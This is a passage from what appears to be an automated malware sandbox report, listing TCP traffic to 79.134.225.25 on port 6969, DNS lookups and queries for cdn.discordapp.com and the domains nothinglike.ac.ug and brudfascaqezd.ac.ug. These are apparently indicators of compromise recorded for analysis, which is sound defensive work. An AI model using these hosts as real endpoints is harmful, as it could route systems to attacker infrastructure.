                                          Jun 4, 2021 09:41:37.904730082 CEST69694980379.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:38.411993027 CEST498036969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:38.460948944 CEST69694980379.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:38.974535942 CEST498036969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:39.021795988 CEST69694980379.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:40.547091961 CEST498046969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:40.594345093 CEST69694980479.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:41.099966049 CEST498046969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:41.147100925 CEST69694980479.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:41.662233114 CEST498046969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:41.709485054 CEST69694980479.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:42.829014063 CEST498056969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:42.876080036 CEST69694980579.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:43.381127119 CEST498056969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:43.429302931 CEST69694980579.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:43.943624973 CEST498056969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:43.990804911 CEST69694980579.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:45.108853102 CEST498066969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:45.157589912 CEST69694980679.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:45.662596941 CEST498066969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:45.714555979 CEST69694980679.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:46.225141048 CEST498066969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:46.272438049 CEST69694980679.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:47.412220001 CEST498076969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:47.460722923 CEST69694980779.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:47.975285053 CEST498076969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:48.023576975 CEST69694980779.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:48.537815094 CEST498076969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:48.585050106 CEST69694980779.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:49.695470095 CEST498086969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:49.745448112 CEST69694980879.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:50.256684065 CEST498086969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:50.305470943 CEST69694980879.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:50.819194078 CEST498086969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:50.866411924 CEST69694980879.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:51.977195978 CEST498096969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:52.025643110 CEST69694980979.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:52.539108992 CEST498096969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:52.586256981 CEST69694980979.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:53.100610018 CEST498096969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:53.150243044 CEST69694980979.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:54.266942978 CEST498106969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:54.314446926 CEST69694981079.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:54.819638014 CEST498106969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:54.866772890 CEST69694981079.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:55.382153034 CEST498106969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:55.429706097 CEST69694981079.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:56.549654007 CEST498116969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:56.599483013 CEST69694981179.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:57.101008892 CEST498116969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:57.154889107 CEST69694981179.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:57.663506031 CEST498116969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:57.711523056 CEST69694981179.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:58.831418037 CEST498126969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:58.878529072 CEST69694981279.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:59.382473946 CEST498126969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:59.429568052 CEST69694981279.134.225.25192.168.2.4
                                          Jun 4, 2021 09:41:59.944935083 CEST498126969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:41:59.992188931 CEST69694981279.134.225.25192.168.2.4
                                          Jun 4, 2021 09:42:01.082364082 CEST498136969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:42:01.129539013 CEST69694981379.134.225.25192.168.2.4
                                          Jun 4, 2021 09:42:01.632603884 CEST498136969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:42:01.679652929 CEST69694981379.134.225.25192.168.2.4
                                          Jun 4, 2021 09:42:02.195327997 CEST498136969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:42:02.245663881 CEST69694981379.134.225.25192.168.2.4
                                          Jun 4, 2021 09:42:03.359512091 CEST498146969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:42:03.410020113 CEST69694981479.134.225.25192.168.2.4
                                          Jun 4, 2021 09:42:03.914139986 CEST498146969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:42:03.962363958 CEST69694981479.134.225.25192.168.2.4
                                          Jun 4, 2021 09:42:04.476588011 CEST498146969192.168.2.479.134.225.25
                                          Jun 4, 2021 09:42:04.525448084 CEST69694981479.134.225.25192.168.2.4

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Jun 4, 2021 09:39:47.727473021 CEST4925753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:47.771238089 CEST53492578.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:48.525234938 CEST6238953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:48.574261904 CEST53623898.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:49.486754894 CEST4991053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:49.535496950 CEST53499108.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:50.494714022 CEST5585453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:50.536011934 CEST53558548.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:57.147141933 CEST6454953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:57.198767900 CEST53645498.8.8.8192.168.2.4
                                          Jun 4, 2021 09:39:57.574749947 CEST6315353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:39:57.624927998 CEST53631538.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:00.506942034 CEST5299153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:00.555979013 CEST53529918.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:01.415688038 CEST5370053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:01.457792997 CEST53537008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:02.315181971 CEST5172653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:02.356365919 CEST53517268.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:03.151670933 CEST5679453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:03.202284098 CEST53567948.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:03.958817959 CEST5653453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:03.999900103 CEST53565348.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:04.839706898 CEST5662753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:04.880892038 CEST53566278.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:05.650723934 CEST5662153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:05.699759960 CEST53566218.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:06.939809084 CEST6311653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:06.982979059 CEST53631168.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:12.372137070 CEST6407853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:12.415651083 CEST53640788.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:13.298985004 CEST6480153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:13.348169088 CEST53648018.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:14.205878973 CEST6172153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:14.247083902 CEST53617218.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:15.134371996 CEST5125553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:15.177704096 CEST53512558.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:16.026128054 CEST6152253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:16.069525003 CEST5233753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:16.111032963 CEST53523378.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:16.129209995 CEST53615228.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:17.293454885 CEST5504653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:17.515693903 CEST53550468.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:18.532757044 CEST4961253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:18.656070948 CEST53496128.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:19.782900095 CEST4928553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:19.829819918 CEST5060153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:19.848630905 CEST53492858.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:19.881160975 CEST53506018.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:20.890875101 CEST6087553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:20.940700054 CEST53608758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:22.111352921 CEST5644853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:22.180686951 CEST53564488.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:23.189179897 CEST5917253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:23.238006115 CEST53591728.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:24.409887075 CEST6242053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:24.458822012 CEST53624208.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:25.471311092 CEST6057953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:25.520107031 CEST53605798.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:26.689762115 CEST5018353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:26.738759995 CEST53501838.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:27.849464893 CEST6153153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:27.899045944 CEST53615318.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:29.418231964 CEST4922853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:29.469103098 CEST53492288.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:29.655761957 CEST5979453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:29.707072973 CEST53597948.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:30.482249975 CEST5591653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:30.605134964 CEST53559168.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:31.892159939 CEST5275253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:32.028281927 CEST53527528.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:33.035231113 CEST6054253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:33.085849047 CEST53605428.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:34.236119986 CEST6068953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:34.285319090 CEST53606898.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:35.292241096 CEST6420653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:35.394838095 CEST53642068.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:36.549367905 CEST5090453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:36.664606094 CEST53509048.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:37.678133011 CEST5752553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:38.007536888 CEST5381453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:38.057444096 CEST53538148.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:38.686717033 CEST5752553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:38.735856056 CEST53575258.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:38.959199905 CEST53575258.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:39.890947104 CEST5341853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:39.940066099 CEST53534188.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:40.951872110 CEST6283353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:41.000473976 CEST53628338.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:42.213363886 CEST5926053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:42.285602093 CEST53592608.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:42.890507936 CEST4994453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:42.941764116 CEST53499448.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:43.004446030 CEST6330053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:43.056083918 CEST53633008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:43.303922892 CEST6144953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:43.352905035 CEST53614498.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:43.625176907 CEST5127553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:43.673769951 CEST53512758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:44.096595049 CEST6349253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:44.163150072 CEST53634928.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:44.493014097 CEST5894553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:44.544090033 CEST53589458.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:44.619203091 CEST6077953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:44.667825937 CEST53607798.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:45.050326109 CEST6401453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:45.099097013 CEST53640148.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:45.677834988 CEST5709153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:45.728987932 CEST53570918.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:45.813648939 CEST5590453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:45.855035067 CEST53559048.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:47.621577024 CEST5210953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:47.670643091 CEST53521098.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:47.980453014 CEST5445053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:48.028963089 CEST53544508.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:48.652345896 CEST4937453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:48.701225996 CEST53493748.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:48.971319914 CEST5043653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:49.019717932 CEST53504368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:49.869676113 CEST6260553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:49.920325994 CEST53626058.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:50.174776077 CEST5425653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:50.223773003 CEST53542568.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:51.041712046 CEST5218953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:51.092365026 CEST53521898.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:51.236432076 CEST5613153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:51.287056923 CEST53561318.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:51.587747097 CEST6299253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:51.637762070 CEST53629928.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:52.444996119 CEST5443253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:52.494193077 CEST53544328.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:53.502222061 CEST5722753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:53.551012993 CEST53572278.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:54.703207016 CEST5838353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:54.753180981 CEST53583838.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:55.762176037 CEST6313653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:55.813472033 CEST53631368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:57.114552975 CEST5091153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:57.156025887 CEST53509118.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:58.169900894 CEST6340953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:58.218678951 CEST53634098.8.8.8192.168.2.4
                                          Jun 4, 2021 09:40:59.510843992 CEST5918553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:40:59.560050964 CEST53591858.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:00.566936016 CEST6423653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:00.669122934 CEST53642368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:01.106141090 CEST5615753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:01.155877113 CEST53561578.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:01.952771902 CEST5560153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:02.001405954 CEST53556018.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:03.012248039 CEST5298453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:03.061315060 CEST53529848.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:04.241699934 CEST5114153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:04.290596962 CEST53511418.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:05.381131887 CEST5361053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:05.429944038 CEST53536108.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:06.781021118 CEST6124753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:06.830806971 CEST53612478.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:07.852442980 CEST6516553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:07.903352022 CEST53651658.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:09.087080956 CEST5207653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:09.129702091 CEST53520768.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:10.148986101 CEST5490353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:10.197743893 CEST53549038.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:11.368159056 CEST5504553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:11.409699917 CEST53550458.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:12.430563927 CEST5446453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:12.471990108 CEST53544648.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:13.652421951 CEST5097053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:13.701833963 CEST53509708.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:14.711209059 CEST5526153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:14.761611938 CEST53552618.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:15.930104017 CEST5980953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:15.979192019 CEST53598098.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:17.113964081 CEST5127853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:17.167419910 CEST53512788.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:18.341006994 CEST5193253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:18.453221083 CEST53519328.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:19.466461897 CEST5949453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:19.515099049 CEST53594948.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:20.680043936 CEST5591553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:20.731895924 CEST53559158.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:21.743691921 CEST4977953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:21.794507027 CEST53497798.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:22.963929892 CEST4945853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:23.012999058 CEST53494588.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:24.024235964 CEST5716453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:24.065589905 CEST53571648.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:25.228212118 CEST4984053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:25.277705908 CEST53498408.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:26.291290998 CEST5717453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:26.342190981 CEST53571748.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:27.510420084 CEST5853153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:27.559171915 CEST53585318.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:28.571286917 CEST4960853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:28.619645119 CEST53496088.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:29.422276974 CEST5568253192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:29.488337040 CEST53556828.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:29.790783882 CEST6243653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:29.840023994 CEST53624368.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:30.827208042 CEST6123053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:30.856579065 CEST6473053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:30.875799894 CEST53612308.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:30.906867027 CEST53647308.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:32.107619047 CEST6062453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:32.156562090 CEST53606248.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:33.167161942 CEST6260053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:33.215828896 CEST53626008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:34.388963938 CEST5320053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:34.438519001 CEST53532008.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:35.449734926 CEST6103453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:35.498428106 CEST53610348.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:36.683897972 CEST5768753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:36.733165979 CEST53576878.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:37.807146072 CEST4983953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:37.855993032 CEST53498398.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:39.149837017 CEST5797553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:39.199364901 CEST53579758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:40.482820988 CEST5761053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:40.531407118 CEST53576108.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:41.715715885 CEST5513753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:41.765302896 CEST53551378.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:42.777014971 CEST5921653192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:42.827914000 CEST53592168.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:43.996402025 CEST6349553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:44.045500994 CEST53634958.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:45.058801889 CEST6437153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:45.107799053 CEST53643718.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:46.277839899 CEST5403753192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:46.326437950 CEST53540378.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:47.362359047 CEST5348153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:47.411079884 CEST53534818.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:48.591324091 CEST5831353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:48.640156031 CEST53583138.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:49.652962923 CEST5895053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:49.694082975 CEST53589508.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:50.874732971 CEST5501153192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:50.925890923 CEST53550118.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:51.934591055 CEST5719853192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:51.975991011 CEST53571988.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:53.155333042 CEST6087553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:53.196373940 CEST53608758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:54.217448950 CEST5513453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:54.265856028 CEST53551348.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:55.435005903 CEST5369553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:55.483614922 CEST53536958.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:56.497416019 CEST5097553192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:56.548612118 CEST53509758.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:57.716850996 CEST6546053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:57.765820980 CEST53654608.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:58.778393984 CEST6366953192.168.2.48.8.8.8
                                          Jun 4, 2021 09:41:58.829729080 CEST53636698.8.8.8192.168.2.4
                                          Jun 4, 2021 09:41:59.995588064 CEST5165353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:00.037149906 CEST53516538.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:01.040570021 CEST5647353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:01.081743956 CEST53564738.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:02.247749090 CEST6145453192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:02.300141096 CEST53614548.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:03.308010101 CEST5432353192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:03.358968019 CEST53543238.8.8.8192.168.2.4
                                          Jun 4, 2021 09:42:04.529351950 CEST5996053192.168.2.48.8.8.8
                                          Jun 4, 2021 09:42:04.572482109 CEST53599608.8.8.8192.168.2.4

                                          ICMP Packets

                                          TimestampSource IPDest IPChecksumCodeType
                                          Jun 4, 2021 09:40:38.959440947 CEST192.168.2.48.8.8.8d005(Port unreachable)Destination Unreachable

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Jun 4, 2021 09:39:57.147141933 CEST192.168.2.48.8.8.80xf48bStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:16.026128054 CEST192.168.2.48.8.8.80x559fStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:17.293454885 CEST192.168.2.48.8.8.80x89d1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:18.532757044 CEST192.168.2.48.8.8.80xb28fStandard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:19.829819918 CEST192.168.2.48.8.8.80xd1a1Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:20.890875101 CEST192.168.2.48.8.8.80x3c4Standard query (0)nothinglike.ac.ugA (IP address)IN (0x0001)
                                          Jun 4, 2021 09:40:22.111352921 CEST192.168.2.48.8.8.80x54e8Standard query (0)brudfascaqezd.ac.ugA (IP address)IN (0x0001)
